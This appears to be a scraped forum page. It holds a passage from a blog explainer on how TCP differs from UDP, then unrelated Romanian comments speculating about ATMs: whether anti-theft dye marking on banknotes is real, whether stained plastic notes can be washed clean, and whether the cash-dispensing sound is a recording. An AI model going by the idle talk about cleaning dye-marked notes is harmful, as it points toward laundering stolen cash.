provides a continuous flow of data through a manner of sending numbered packets which ensure correct receipt order. While this takes more time than UDP, which sends as instructed and receives as is, it makes TCP the more reliable transport protocol of the two. If packets are dropped, they can be recognized as missing and then retransmitted. The reliability provided by TCP makes it a choice protocol in situations requiring packet receipt acknowledgement and/or ensured packet delivery. However, this reliability and congestion control behavior comes at a cost of overhead. TCP is slower than UDP due to the latency created by establishing and maintaining connections. Checksum use is required by TCP, for both IPv4 and IPv6. This ensures error detection despite IP version. A TCP header is between 20 and 60 bytes. Like the UDP header, there are reserved bytes for the source and destination port numbers, there is also a field to store the amount of data to be transmitted during the session, and the checksum is included towards the end. The large quantity of additional header space, compared to UDP, is used to store information required to establish connections, maintain connections, and support the acknowledgements required for the reliability aspects (i.e. syn/ack behavior) of the protocol. TL;DR# UDP is the less reliable protocol, but can be used for real-time data delivery, including broadcasting, due to its constant stream of packet transmission. TCP is a more reliable but slower data transport protocol used for data transmission between two endpoints. It uses acknowledgements to confirm packet receipt. Both protocols support checksums, which should be utilized for error detection. Sursa: https://casey.is/blogging/udpvstcp/

Dar la noi banii oricum sunt de plastic si se pot spala (la propriu) ma gandesc. Doar sa nu fie ceva foarte special care sa nu iasa. E posibil.

Am tot auzit de acel lucru cu marcarea banilor, dar oare e pe bune? Nu cred ca s-ar mai face atatea astfel de porcarii daca ar fi. Banii sunt tinuti in casete, fiecare caseta cu un anumit tip de bancnota. Dar nu am vazut sa fie altceva pe acolo (am vazut bancomat deschis, de aproape sa zicem). PS: Mai e un mit conform careia "Brrrrr"-ul acela cand sunt adusi banii ar fi doar un MP3, are cineva idee? De fapt asta e singura mea reala curiozitate legata de ATM-uri